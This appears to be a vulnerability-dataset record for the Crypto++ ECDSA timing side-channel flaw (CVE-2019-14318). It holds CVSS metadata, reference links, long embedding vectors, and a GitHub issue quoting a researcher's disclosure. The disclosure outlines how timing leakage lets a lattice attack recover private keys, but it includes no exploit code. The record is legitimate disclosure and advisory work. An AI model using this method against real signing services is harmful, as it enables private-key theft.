-0.0146061135455966, 0.0024214789737015963, 0.007461399305611849, -0.003653459483757615, -0.004120762459933758, -0.010628245770931244, -0.012250288389623165, -0.024546921253204346, -0.003860076889395714, -0.006924579851329327, 0.00672375550493598, 0.009709087200462818, 0.014413013122975826, -0.023820864036679268, -0.004642133601009846, 0.003137881401926279, 0.01279096957296133, 0.005507223308086395, 0.0009273646282963455, -0.0032093285117298365, 0.006712169386446476, -0.008125664666295052, 0.010110736824572086, -0.012628765776753426, 0.006851201876997948, -0.0007511604926548898, -0.01353247556835413, 0.0007304022437892854, 0.0015612166607752442, -0.009075718000531197, -0.004607375245541334, 0.008087044581770897, -0.0006840581190772355, 0.0016104571986943483, 0.007472984958440065, -0.00014772180293221027, 0.02366638369858265, 0.023975344374775887, 0.013571095652878284, -0.003444910980761051, -0.02028326503932476, 0.0007917116163298488, 0.009199302643537521, -0.0016799734439700842, -0.010952654294669628, -0.01432032510638237, -0.0044953771866858006, 0.00438337866216898, -0.008952134288847446, 0.0012339114909991622, 0.0015583201311528683, -0.0025083741638809443, 0.0009423298761248589, -0.004298414569348097, -0.01084451749920845, 0.008959857746958733, 0.004024212248623371, 0.0036264252848923206, 0.011284787207841873, -0.013254410587251186, 0.016096848994493484, -0.013045862317085266, -0.0010417766170576215, -0.021009322255849838, -0.016745666041970253, -0.03858918324112892, 0.002633889438584447, 0.001872108317911625, 0.005711909383535385, -0.027296671643853188, 0.01762620359659195, -0.0077510494738817215, -0.03407835587859154, -0.0029737460426986217, 0.0007357124704867601, 0.0033078095875680447, 0.03478896617889404, 0.0005344053497537971, 0.023450111970305443, 0.0029602290596812963, 0.01623588055372238, 0.0207003615796566, -0.012860486283898354, -0.0002804783289320767, -0.02491767518222332, -0.009585503488779068, -0.0017379035707563162, -0.002940919017419219, -0.002599131315946579, 0.019016526639461517, -0.022909430786967278, -0.00985584408044815, 0.0029022989328950644, 0.02491767518222332, 0.00282312766648829, 0.019897064194083214, -0.008504141122102737, 0.002707267412915826, -0.0037229754962027073, 0.000013517027582565788, 0.007561811245977879, -0.001324668643064797, 0.00457261735573411, 0.013648335821926594, 0.007291470654308796, -0.008496416732668877, -0.0156488548964262, 0.05984567478299141, 0.012049464508891106, 0.018414054065942764, -0.005762115586549044, -0.012520628981292248, -0.002419547876343131, -0.016189536079764366, -0.005341156851500273, -0.005681013688445091, 0.0207003615796566, 0.014382117427885532, 0.0005397155764512718, 0.01581105962395668, -0.005051506217569113, -0.0037654575426131487, -0.009500538930296898, -0.006175350397825241, 0.005267778877168894, -0.004935645963996649, -0.010381077416241169, -0.011083962395787239, 0.010759553872048855, 0.02184351533651352, -0.006789409555494785, 0.01598871313035488, 0.008704965934157372, -0.004078280180692673, -0.008365108631551266, 0.009716811589896679, -0.00943102315068245, 0.0310505423694849, -0.010628245770931244, 0.007538639008998871, 0.005862527992576361, 0.008944409899413586, 0.0006126110092736781, 0.01728634722530842, 0.008596829138696194, 0.010319285094738007, -0.02558193914592266, 0.020159680396318436, 0.0049626799300313, -0.014791489578783512, 0.00682802964001894, -0.0038851797580718994, 0.0003241672820877284, -0.01696193777024746, -0.012142152525484562, 0.018151436001062393, 0.017348138615489006, 0.02647792547941208, 0.0025952693540602922, 0.002510305028408766, 0.002489064121618867, -0.014127224683761597, -0.020329609513282776, -0.004151658620685339, 0.01523175835609436, -0.011987672187387943, -0.00390062783844769, -0.018645774573087692, -0.007847599685192108, -0.004773441702127457, -0.014436185359954834, -0.024871330708265305, -0.004062832333147526, -0.010458317585289478, 0.01853763684630394, -0.01870756596326828, 0.025767315179109573, 0.004028073977679014, -0.001767834066413343, -0.004143934231251478, 0.0015090795932337642, -0.007187196519225836, -0.0040473840199410915, 0.00554584339261055, -0.008743586018681526, 0.012196220457553864, -0.001605629688128829, -0.0020063130650669336, -0.009963979944586754, -0.008465521037578583, -0.0132466871291399, 0.014729698188602924, 0.006047904025763273, -0.007133128587156534, -0.004734821617603302, -0.02450057677924633, 0.0249022264033556, 0.02252322994172573, -0.0022264474537223577, -0.015571615658700466, -0.0005286122905090451, 0.018027853220701218, -0.021627243608236313, -0.021210147067904472, -0.015363067388534546, -0.00409759022295475, 0.0044953771866858006, 0.002056519268080592, 0.004657581448554993, -0.004445170983672142, -0.005198262631893158, -0.00018754875054582953, -0.009392403066158295, 0.009624123573303223, -0.004364068619906902, -0.0009466746705584228, 0.0027999556623399258, 0.0019252109341323376, -0.007874634116888046, -0.018259573727846146, -0.0029080919921398163, 0.011562851257622242, 0.014459357596933842, 0.016266776248812675, -0.0026705784257501364, 0.008380556479096413, 0.014134948141872883, 0.001081362133845687, -0.011964499950408936, 0.020128784701228142, 0.02615351602435112, -0.009384678676724434, 0.010442868806421757, 0.007021130062639713, 0.0282235536724329, -0.01216532476246357, 0.011083962395787239, 0.0025083741638809443, -0.01216532476246357, 0.014011364430189133, 0.00964729581028223, 0.0026667164638638496, 0.011207547038793564, -0.018522189930081367, -0.008874894119799137, 0.028115415945649147, -0.009160682559013367, 0.006812581792473793, 0.05857893452048302, 0.0034912549890577793, 0.0037171824369579554, -0.008473245427012444, -0.005001300014555454, 0.008874894119799137, 0.010697761550545692, -0.0008032976184040308, -0.020746706053614616, 0.02442333661019802, 0.0022303094156086445, -0.0016510083805769682, 0.020978426560759544, 0.004692339338362217, 0.0011190167861059308, 0.0161431934684515, 0.012196220457553864, -0.019742583855986595, -0.002759404480457306, 0.0016848009545356035, 0.016158640384674072, 0.006198522634804249, -0.002054588170722127, 0.00395276490598917, 0.00877448171377182, -0.01390322856605053, -0.002085484331473708, 0.02284763753414154, -0.00015073899703565985, -0.014358945190906525, 0.004850681871175766, -0.01795061305165291, -0.012698281556367874, 0.00006342140841297805, 0.012389320880174637, 0.011323407292366028, 0.006156040355563164, 0.0076931193470954895, 0.01563340798020363, 0.01739448308944702, 0.006696721538901329, -0.004174830392003059, 0.014621561393141747, 0.03651914745569229, -0.014212188310921192, -0.028748786076903343, -0.00926881842315197, 0.014582941308617592, 0.002956366864964366, 0.004367930814623833, -0.017008282244205475, 0.010574176907539368, 0.005966802127659321, -0.020468641072511673, 0.0029814699664711952, 0.010612796992063522, -0.012173048220574856, 0.015849679708480835, -0.0011643953621387482, 0.011037617921829224, -0.028099969029426575, -0.017008282244205475, 0.0050901263020932674 ]
100
CVE-2019-14318
2019-07-30T17:15:12.687000
Crypto++ 8.3.0 and earlier contains a timing side channel in ECDSA signature generation. This allows a local or remote attacker, able to measure the duration of hundreds to thousands of signing operations, to compute the private key used. The issue occurs because scalar multiplication in ecp.cpp (prime field curves, small leakage) and algebra.cpp (binary field curves, large leakage) is not constant time and leaks the bit length of the scalar among other information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00066.html" }, { "source": "[email protected]", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2019/10/02/2" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://eprint.iacr.org/2011/232.pdf" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/weidai11/cryptopp/issues/869" }, { "source": "[email protected]", "tags": null, "url": "https://minerva.crocs.fi.muni.cz/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://tches.iacr.org/index.php/TCHES/article/view/7337" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cryptopp:crypto\\+\\+:*:*:*:*:*:*:*:*", "matchCriteriaId": "A83A83BF-E04E-4E80-B0F8-46BB3DEF1D06", "versionEndExcluding": null, "versionEndIncluding": "8.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/weidai11/cryptopp/issues/869
[ "Patch", "Third Party Advisory" ]
github.com
[ "weidai11", "cryptopp" ]
From a private email by Ján Jančár: > Message-ID: <[email protected]> > Subject: Vulnerability disclosure > ... > > During our research into security of elliptic curve cryptography implementations on smart-cards and in software libraries [1], we have discovered timing leakage in the ECDSA signature generation in the Crypto++ library. > > *Vulnerability description* > > When performing ECDSA over binary field curves, Crypto++ leaks the bit-length of the nonce used in scalar multiplication. It also leaks some other currently unknown information, see the attached plots, specifically the 'msb_hist.png' plot. > > This leakage can be abused if an attacker is able to measure the duration of signing of a few hundreds or thousands of known messages. The attacker can then use a lattice attack based on the Hidden Number Problem [2] to reconstruct the private key used, as demonstrated in [3] (even remotely!). > > See the attached plots and heatmaps for details of the leakage on the standard sect233r1 curve. based on the level of noise present in the attacker's measurements (the lattice attack is very sensitive to noise) and willingness to trade-off computation time, the attack would require from 500 to 10k signatures. > > The private key recovery itself, assuming a noise free set of just enough signatures, would then take a few minutes. The leakage is somewhat present in ECDSA over prime field curves as well, but much smaller, I do not know the cause of this. > > [1]: ECTester: https://crocs-muni.github.io/ECTester/ > > [2]: D. Boneh, R. Venkatesan: Hardness of computing the most significant bits of secret keys in Diffie-Hellman and related schemes; https://crypto.stanford.edu/~dabo/abstracts/dhmsb.html > > [3]: B. B. Brumley, N. Tuveri: Remote Timing Attacks are Still Practical; https://eprint.iacr.org/2011/232.pdf It appears nearly all versions of Crypto++ are affected. Based on some research of antique Crypto++, I believe that means Crypto++ 3.2 and forward. Crypto++ 3.2 was released March 20, 2000. Also posted to the mailing list at [ECDSA timing leaks](https://groups.google.com/forum/#!topic/cryptopp-users/1GGTAh4CEdA).
Elliptic Curve timing leaks
https://api.github.com/repos/weidai11/cryptopp/issues/869/comments
9
2019-07-26T04:49:09
2020-12-20T11:23:40Z
https://github.com/weidai11/cryptopp/issues/869
473,175,638
869
true
This is a GitHub Issue repo:cryptopp owner:weidai11 Title : Elliptic Curve timing leaks Issue date: --- start body --- From a private email by Ján Jančár: > Message-ID: <[email protected]> > Subject: Vulnerability disclosure > ... > > During our research into security of elliptic curve cryptography implementations on smart-cards and in software libraries [1], we have discovered timing leakage in the ECDSA signature generation in the Crypto++ library. > > *Vulnerability description* > > When performing ECDSA over binary field curves, Crypto++ leaks the bit-length of the nonce used in scalar multiplication. It also leaks some other currently unknown information, see the attached plots, specifically the 'msb_hist.png' plot. > > This leakage can be abused if an attacker is able to measure the duration of signing of a few hundreds or thousands of known messages. The attacker can then use a lattice attack based on the Hidden Number Problem [2] to reconstruct the private key used, as demonstrated in [3] (even remotely!). > > See the attached plots and heatmaps for details of the leakage on the standard sect233r1 curve. based on the level of noise present in the attacker's measurements (the lattice attack is very sensitive to noise) and willingness to trade-off computation time, the attack would require from 500 to 10k signatures. > > The private key recovery itself, assuming a noise free set of just enough signatures, would then take a few minutes. The leakage is somewhat present in ECDSA over prime field curves as well, but much smaller, I do not know the cause of this. > > [1]: ECTester: https://crocs-muni.github.io/ECTester/ > > [2]: D. Boneh, R. Venkatesan: Hardness of computing the most significant bits of secret keys in Diffie-Hellman and related schemes; https://crypto.stanford.edu/~dabo/abstracts/dhmsb.html > > [3]: B. B. Brumley, N. Tuveri: Remote Timing Attacks are Still Practical; https://eprint.iacr.org/2011/232.pdf It appears nearly all versions of Crypto++ are affected. Based on some research of antique Crypto++, I believe that means Crypto++ 3.2 and forward. Crypto++ 3.2 was released March 20, 2000. Also posted to the mailing list at [ECDSA timing leaks](https://groups.google.com/forum/#!topic/cryptopp-users/1GGTAh4CEdA). --- end body ---
2,361
[ -0.008618052117526531, -0.037680331617593765, -0.01167485024780035, 0.006037932820618153, 0.026603223755955696, 0.02707233466207981, 0.020989004522562027, 0.03389716520905495, -0.03108249232172966, 0.05695934593677521, -0.008595352992415428, 0.00485001876950264, 0.014428994618356228, -0.006537310779094696, 0.03247469663619995, 0.05481050908565521, -0.007029122207313776, -0.03156673535704613, 0.024045802652835846, -0.02203315868973732, -0.01999024860560894, -0.0024477082770317793, -0.001151028205640614, 0.04909036308526993, -0.02474190481007099, 0.05426573380827904, -0.003304595360532403, -0.01859804429113865, -0.03489592298865318, 0.02247200533747673, 0.06252816319465637, 0.029508695006370544, -0.03383663669228554, -0.0444900318980217, 0.023743148893117905, -0.032202307134866714, 0.04385446012020111, 0.02604331448674202, -0.037377677857875824, -0.04276490956544876, 0.0023531292099505663, -0.0255439355969429, -0.013944749720394611, -0.004577630665153265, 0.0009259298676624894, 0.01619195006787777, -0.0022831405512988567, -0.013082187622785568, -0.013127585873007774, 0.01832565665245056, 0.01316541712731123, -0.05299459025263786, -0.06440461426973343, -0.04079766198992729, 0.007089653052389622, -0.013869086280465126, 0.023818813264369965, 0.02393987402319908, 0.05535528436303139, 0.0020429096184670925, 0.015329388901591301, 0.021715372800827026, 0.004657077137380838, 0.03311026841402054, 0.031990449875593185, 0.04188721254467964, -0.06373877823352814, 0.016449205577373505, -0.022139087319374084, -0.013225948438048363, -0.053297240287065506, -0.014270101673901081, 0.06101490184664726, 0.011621885932981968, 0.03849749639630318, -0.011190605349838734, 0.04806134104728699, 0.02436358854174614, -0.000727313628885895, 0.0013732892693951726, -0.04576117545366287, 0.029750816524028778, -0.032202307134866714, 0.011114941909909248, 0.022865455597639084, -0.023440496996045113, -0.026860477402806282, -0.0656152293086052, 0.003087063319981098, -0.009510879404842854, -0.028782326728105545, 0.022956250235438347, -0.03828563913702965, 0.04270437732338905, -0.01050206832587719, 0.006291404832154512, -0.005111057311296463, -0.009026633575558662, -0.06452567875385284, 0.019021758809685707, -0.01561690866947174, 0.026572957634925842, -0.021125199273228645, -0.02474190481007099, 0.010857686400413513, -0.031203553080558777, 0.0035921160597354174, 0.0068323975428938866, 0.03419981896877289, 0.12723544239997864, 0.00853482261300087, -0.004808404017239809, -0.004460352472960949, -0.025120221078395844, -0.03774086385965347, 0.02524128369987011, -0.005114840343594551, -0.027465784922242165, -0.030764706432819366, -0.01634327694773674, -0.04751656576991081, -0.02145811729133129, 0.006677288096398115, 0.0071350508369505405, -0.027480917051434517, 0.033745840191841125, 0.014474392868578434, 0.018507247790694237, 0.007967347279191017, -0.028721796348690987, -0.02050475962460041, 0.0019426557701081038, 0.022638464346528053, -0.035289373248815536, 0.007800888270139694, 0.01268873829394579, 0.05829102173447609, 0.04902983084321022, 0.010085920803248882, 0.007770623080432415, -0.02459057793021202, -0.022290414199233055, 0.018128931522369385, -0.0077630565501749516, -0.039223864674568176, -0.02121599391102791, -0.02100413665175438, 0.011425160802900791, -0.04473215341567993, -0.006230874452739954, -0.01744796149432659, -0.013157851062715054, 0.020489627495408058, -0.015995224937796593, 0.048485055565834045, -0.0222601480782032, 0.03295894339680672, 0.015329388901591301, -0.018946094438433647, -0.062043920159339905, -0.05411440506577492, 0.006998857017606497, 0.020413963124155998, -0.01729663461446762, -0.03153647109866142, -0.002517696935683489, 0.007744140923023224, 0.015919562429189682, -0.034260351210832596, 0.02014157548546791, 0.01837105304002762, -0.009987558238208294, 0.002476082183420658, 0.024847833439707756, -0.02990214340388775, 0.01097874715924263, -0.0048916335217654705, -0.026936141774058342, -0.015041868202388287, -0.03976863995194435, 0.0038815282750874758, 0.023682618513703346, -0.02151864767074585, 0.03495645523071289, 0.024091200903058052, -0.01815919578075409, 0.04297676682472229, -0.009268756955862045, -0.002022102242335677, -0.04603356495499611, 0.015276423655450344, 0.00466842669993639, 0.017478227615356445, -0.01832565665245056, -0.016237348318099976, 0.009942159987986088, 0.0015983876073732972, -0.031052226200699806, 0.006730252411216497, 0.02100413665175438, 0.004350640811026096, -0.017402563244104385, -0.021624576300382614, -0.024424118921160698, -0.009790833108127117, 0.029296837747097015, 0.00567474914714694, 0.03619733080267906, -0.010517201386392117, -0.020731749013066292, -0.014421428553760052, -0.004543582443147898, 0.013952315784990788, 0.0028960134368389845, -0.0011737272143363953, -0.0011444076662883162, 0.020550157874822617, 0.031778592616319656, -0.020535023882985115, -0.013922050595283508, 0.00802787858992815, 0.001639056601561606, 0.012287722900509834, -0.0415845587849617, -0.0328378789126873, 0.021579178050160408, 0.003302703844383359, 0.0518142394721508, 0.017886808142066002, -0.032716818153858185, 0.0313851460814476, -0.011538656428456306, -0.017765747383236885, 0.007029122207313776, -0.02094360627233982, -0.03232337161898613, 0.0011718356981873512, 0.0014385489048436284, 0.010797156020998955, 0.0066394563764333725, 0.009480614215135574, 0.013702627271413803, -0.028055958449840546, -0.022577933967113495, -0.04733497276902199, 0.00889800675213337, -0.010645829141139984, 0.034109022468328476, -0.029871879145503044, 0.018219728022813797, 0.0044717020355165005, -0.03159700334072113, -0.01502673514187336, -0.00922335870563984, -0.03880015015602112, -0.009215792641043663, 0.0012266915291547775, 0.013800989836454391, 0.003563742386177182, -0.010244813747704029, 0.0302804596722126, 0.01750849187374115, -0.036076270043849945, 0.03171806409955025, -0.043158356100320816, 0.015442883595824242, -0.025710396468639374, 0.017463093623518944, -0.009692471474409103, -0.04110031574964523, 0.030537715181708336, -0.01911255531013012, 0.016237348318099976, -0.029962673783302307, -0.00820190366357565, -0.010396139696240425, -0.0008573599625378847, 0.002453383058309555, 0.03165753185749054, -0.014527357183396816, 0.01750849187374115, 0.04697178676724434, -0.004278760869055986, -0.0022301762364804745, 0.04209906980395317, 0.009404950775206089, -0.033231329172849655, -0.019021758809685707, -0.01401284709572792, -0.015004036016762257, -0.02123112790286541, 0.024166863411664963, -0.0809900164604187, 0.020989004522562027, -0.00465329410508275, -0.005054309498518705, -0.015526113100349903, -0.01737229712307453, -0.0423109270632267, -0.005561253987252712, -0.027980295941233635, -0.021775903180241585, -0.033443186432123184, 0.008587786927819252, -0.054023608565330505, -0.036076270043849945, 0.0027371204923838377, 0.00915526133030653, -0.024832701310515404, -0.030159398913383484, -0.02742038667201996, -0.04718364402651787, 0.020807413384318352, 0.0065259612165391445, 0.005663399584591389, 0.01575310342013836, 0.005428843200206757, 0.0459427684545517, 0.01626761443912983, -0.028207285329699516, 0.0013382949400693178, 0.039950232952833176, -0.038769885897636414, -0.008224602788686752, 0.009578975848853588, -0.01888556405901909, -0.019793523475527763, -0.003656429937109351, -0.04143323376774788, 0.0013269454939290881, 0.002729554194957018, -0.006885361857712269, -0.05332750827074051, 0.020989004522562027, -0.010199415497481823, -0.045700643211603165, -0.013990147970616817, -0.012007768265902996, 0.01882503367960453, 0.006862663198262453, -0.0237128846347332, -0.00667350459843874, -0.012817366048693657, 0.03295894339680672, -0.011077109724283218, -0.02035343274474144, 0.01765981875360012, -0.003781274426728487, 0.040979254990816116, -0.010479370132088661, 0.0010810396634042263, 0.027223661541938782, 0.033170800656080246, 0.021927230060100555, 0.009715170599520206, -0.03562229126691818, 0.0007618350209668279, -0.030235061421990395, 0.025498539209365845, -0.01831052266061306, 0.015268857590854168, 0.002158296061679721, 0.01069122739136219, 0.05411440506577492, -0.01229528896510601, -0.026209773495793343, -0.014618153683841228, 0.015200761146843433, -0.03665131330490112, 0.02749605104327202, -0.05151158943772316, 0.005512072704732418, -0.021579178050160408, 0.011735380627214909, -0.002394743962213397, -0.0032856797333806753, 0.014504658058285713, 0.04203854128718376, -0.01484514307230711, 0.014080943539738655, -0.05859367549419403, 0.005379661917686462, 0.03698423132300377, -0.0328076146543026, 0.03758953511714935, 0.0016116286860778928, 0.0015964959748089314, 0.010123752057552338, -0.03625786304473877, -0.013619397766888142, -0.03168779984116554, 0.022820057347416878, -0.0023190807551145554, -0.04028315097093582, -0.03159700334072113, 0.030810102820396423, -0.011364630423486233, -0.0028298080433160067, 0.06936813145875931, -0.011304100044071674, -0.002029668539762497, 0.014217137359082699, 0.00038186332676559687, -0.022441741079092026, -0.0038001902867108583, 0.015382353216409683, -0.008300266228616238, -0.011599186807870865, 0.006393550429493189, -0.006121162325143814, 0.0237128846347332, -0.015813633799552917, -0.012053166516125202, -0.010910650715231895, -0.0032043415121734142, 0.0009557222947478294, -0.023909607902169228, 0.022229883819818497, -0.00951844546943903, 0.013044356368482113, -0.03758953511714935, 0.0015596101293340325, 0.029084980487823486, 0.012310422025620937, 0.01382368803024292, 0.027768438681960106, 0.020883075892925262, 0.024620844051241875, 0.0955779030919075, -0.01613141968846321, 0.017841409891843796, 0.0055007231421768665, 0.027238795533776283, -0.011833743192255497, 0.016464337706565857, -0.006760517600923777, -0.030462052673101425, -0.024908363819122314, -0.037317149341106415, -0.044308438897132874, -0.010010257363319397, 0.06031879782676697, 0.0006757680093869567, -0.001120762899518013, 0.01284006517380476, -0.009904328733682632, -0.046669136732816696, 0.02919090911746025, -0.004475485533475876, -0.030583113431930542, -0.0423109270632267, 0.01316541712731123, -0.006597841624170542, -0.02159431204199791, 0.043521542102098465, -0.008928271941840649, -0.03934492543339729, -0.04518613591790199, 0.05199583247303963, 0.012787100858986378, 0.005966052878648043, 0.044096581637859344, -0.01613141968846321, -0.017039379104971886, -0.009351986460387707, 0.04757709428668022, 0.007271245121955872, -0.016615664586424828, 0.0011973719811066985, -0.012310422025620937, 0.017780879512429237, -0.01735716499388218, -0.011061977595090866, 0.0032856797333806753, 0.016812389716506004, 0.04824293404817581, 0.005069442559033632, -0.02092847414314747, -0.019717860966920853, 0.0011746729724109173, -0.02291085384786129, 0.0021261393558233976, -0.003873961977660656, 0.028479672968387604, 0.01538991928100586, -0.025937385857105255, -0.0024552748072892427, -0.025770926848053932, -0.02400040440261364, 0.03595520928502083, -0.014459259808063507, 0.016615664586424828, -0.03050745092332363, -0.027738172560930252, -0.001360993948765099, 0.03786192461848259, 0.0008989748312160373, -0.003773708129301667, 0.040888458490371704, -0.007713875267654657, -0.0008152722730301321, -0.028328346088528633, -0.0018859081901609898, -0.02173050493001938, -0.004501967690885067, -0.033080004155635834, -0.008814776316285133, -0.01598009280860424, 0.011621885932981968, 0.0009902437450364232, 0.015435317531228065, -0.020671218633651733, -0.012794666923582554, -0.0269966721534729, -0.0019114445894956589, -0.013475636951625347, -0.03471432998776436, -0.012779534794390202, 0.011758079752326012, 0.03441167622804642, 0.011606752872467041, -0.021700240671634674, 0.0197027288377285, 0.017750615254044533, 0.011485692113637924, 0.04560985043644905, 0.03765006735920906, 0.020035646855831146, -0.0068286145105957985, -0.00667350459843874, -0.026572957634925842, 0.01250714622437954, -0.013604264706373215, 0.008799644187092781, -0.025725528597831726, 0.014421428553760052, -0.0007537958445027471, 0.02757171355187893, -0.03559202700853348, -0.0004511425504460931, 0.0025895771104842424, 0.01888556405901909, -0.023455629125237465, 0.008232168853282928, -0.01699398085474968, -0.012060733512043953, -0.006113596260547638, -0.0022793575190007687, 0.05120893567800522, -0.004316592123359442, -0.021397586911916733, 0.013051922433078289, -0.015510980039834976, -0.00901150144636631, -0.03268655389547348, -0.0026236255653202534, 0.012401217594742775, 0.002880880841985345, 0.018582910299301147, 0.009972425177693367, -0.020262636244297028, 0.005474240984767675, -0.0030643644277006388, 0.00466842669993639, -0.010048088617622852, -0.0032535227946937084, -0.0038228891789913177, 0.0612872876226902, -0.03123381733894348, -0.016086021438241005, 0.015283990651369095, -0.007369607221335173, -0.034260351210832596, -0.004085819236934185, -0.03480512648820877, 0.006302754394710064, -0.01802300289273262, -0.0017014788463711739, 0.008602919057011604, 0.00006431381916627288, 0.006438948679715395, 0.006533527746796608, 0.005027827341109514, -0.004895416554063559, -0.00041709403740242124, -0.0059395707212388515, -0.01032804325222969, -0.009435215964913368, -0.014905673451721668, -0.013309177942574024, -0.00108955183532089, 0.006257356610149145, 0.014345765113830566, 0.0043960390612483025, 0.04043447598814964, 0.0024666241370141506, 0.00507322559133172, 0.020459361374378204, 0.015117530710995197, -0.0003570362750906497, 0.002841157605871558, 0.03471432998776436, 0.0259071197360754, 0.00004997916767024435, -0.015458015725016594, -0.001571905449964106, -0.01693345047533512, -0.0006710390443913639, -0.027844101190567017, -0.0019237399101257324, 0.0035334769636392593, 0.008693715557456017, 0.023243771865963936, -0.0017951122717931867, 0.05341830477118492, 0.009942159987986088, 0.029811346903443336, 0.021851565688848495, -0.03256549313664436, -0.004479268565773964, 0.02182130143046379, -0.017705217003822327, -0.016872920095920563, 0.012196927331387997, 0.04128190502524376, 0.038709353655576706, -0.00096707179909572, 0.010562599636614323, 0.01628274656832218, -0.02743551880121231, 0.00021871428180020303, 0.0034691630862653255, 0.006972374860197306, -0.005515855737030506, -0.011614319868385792, 0.04630595073103905, 0.01924874819815159, -0.004963513929396868, -0.011780778877437115, 0.0070404717698693275, -0.018946094438433647, 0.020535023882985115, -0.03401822969317436, 0.03668157756328583, -0.033170800656080246, 0.0047743553295731544, -0.021866699680685997, 0.03619733080267906, -0.017084777355194092, 0.02341023087501526, 0.004880283959209919, 0.02121599391102791, 0.021352188661694527, 0.022154219448566437, 0.026815081015229225, -0.02029290236532688, 0.0313548780977726, 0.024696506559848785, -0.007816020399332047, -0.004078252706676722, -0.02661835588514805, 0.005742846056818962, -0.02101927064359188, -0.0074566202238202095, 0.008519689552485943, -0.007032905705273151, -0.019021758809685707, -0.03326159343123436, -0.007536066696047783, 0.0015927128260955215, 0.0009585596853867173, -0.011712681502103806, -0.009412516839802265, -0.012355820275843143, -0.02510508894920349, -0.01912768743932247, -0.03538016974925995, 0.01985405571758747, -0.012446615844964981, -0.0008403357351198792, 0.01874937117099762, -0.017311766743659973, -0.0000766682205721736, -0.02633083425462246, 0.018809901550412178, 0.011864008381962776, -0.008406194858253002, -0.0069231935776770115, -0.038043517619371414, -0.029962673783302307, 0.0111300740391016, -0.02210882119834423, 0.031324613839387894, -0.005432626232504845, -0.000053496332839131355, -0.02545314095914364, 0.0036829120945185423, 0.006665938533842564, -0.03949625417590141, 0.017523624002933502, -0.033231329172849655, 0.02283518947660923, -0.006484346464276314, 0.04896929860115051, -0.00581850903108716, 0.010494502261281013, 0.005077008623629808, -0.02092847414314747, 0.002697397256270051, -0.0069421096704900265, -0.017917074263095856, -0.013611830770969391, -0.007581464480608702, 0.016797257587313652, 0.012257457710802555, -0.060167472809553146, 0.025347212329506874, 0.028555337339639664, -0.01977839134633541, 0.008549954742193222, -0.0111300740391016, 0.011190605349838734, 0.003998806234449148, -0.06434408575296402, 0.02531694620847702, 0.032868146896362305, 0.010403706692159176, -0.007358257658779621, -0.019309278577566147, 0.02386421151459217, -0.026103844866156578, -0.0032856797333806753, 0.031778592616319656, -0.004437653813511133, -0.030310725793242455, 0.008913138881325722, 0.018038135021924973, -0.003601573873311281, 0.03858829289674759, 0.01837105304002762, -0.014330632984638214, 0.007853852584958076, -0.017705217003822327, -0.02136732079088688, 0.014754347503185272, -0.039405457675457, -0.007426354568451643, -0.003266763873398304, -0.02999293990433216, 0.012756835669279099, 0.004301459528505802, 0.02583145722746849, -0.017977604642510414, -0.026300569996237755, -0.009979992173612118, -0.03825537487864494, 0.016297878697514534, -0.007891683839261532, 0.046729665249586105, -0.01280979998409748, 0.0111300740391016, 0.034109022468328476, -0.019279014319181442, -0.017886808142066002, -0.0013732892693951726, 0.006968591827899218, 0.014239836484193802, 0.02867639809846878, 0.01006322167813778, -0.013377274386584759, -0.03259575739502907, -0.0017109367763623595, -0.007634428795427084, -0.004918115679174662, -0.020111309364438057, 0.007592814043164253, 0.0059206546284258366, -0.008012745529413223, 0.026905875653028488, 0.02822241745889187, -0.012787100858986378, 0.0005622730241157115, -0.029735684394836426, 0.019975116476416588, 0.012310422025620937, -0.0028600734658539295, -0.0041879648342728615, -0.0007816966390237212, -0.024968896061182022, 0.0013184333220124245, -0.01817432977259159, -0.014497091993689537, 0.05359989404678345, -0.012560110539197922, -0.005481807515025139, -0.009003935381770134, -0.0035618506371974945, 0.033443186432123184, -0.012325555086135864, -0.024893231689929962, 0.05586979538202286, 0.010252379812300205, -0.024015536531805992, -0.03123381733894348, 0.0076646944507956505, 0.00042229591053910553, -0.008489424362778664, 0.020338300615549088, -0.028979051858186722, 0.021624576300382614, -0.0005547067266888916, 0.012597942724823952, 0.01765981875360012, -0.011591620743274689, 0.0009751110337674618, 0.010744191706180573, -0.009510879404842854, -0.011364630423486233, 0.011500824242830276, 0.02197262831032276, -0.032141778618097305, -0.015510980039834976, 0.011364630423486233, -0.02297138422727585, 0.012628207914531231, 0.007710092235356569, 0.019445473328232765, -0.001785654341802001, 0.021200861781835556, -0.0020183189772069454, 0.0156925730407238, -0.02962975576519966, -0.015344521030783653, 0.012998958118259907, -0.018703972920775414, 0.013301611877977848, -0.02210882119834423, 0.008527255617082119, -0.04113058000802994, 0.024091200903058052, 0.021700240671634674, -0.007403655909001827, -0.023213505744934082, -0.014292800799012184, 0.0026236255653202534, -0.017780879512429237, -0.029962673783302307, 0.008837475441396236, 0.009927027858793736, -0.013120019808411598, 0.007698742672801018, 0.01628274656832218, 0.011251135729253292, 0.014391163364052773, 0.000012332234291534405, -0.005890389438718557, -0.006794565822929144, -0.02422739565372467, 0.00904176663607359, -0.04270437732338905, 0.04485321417450905, 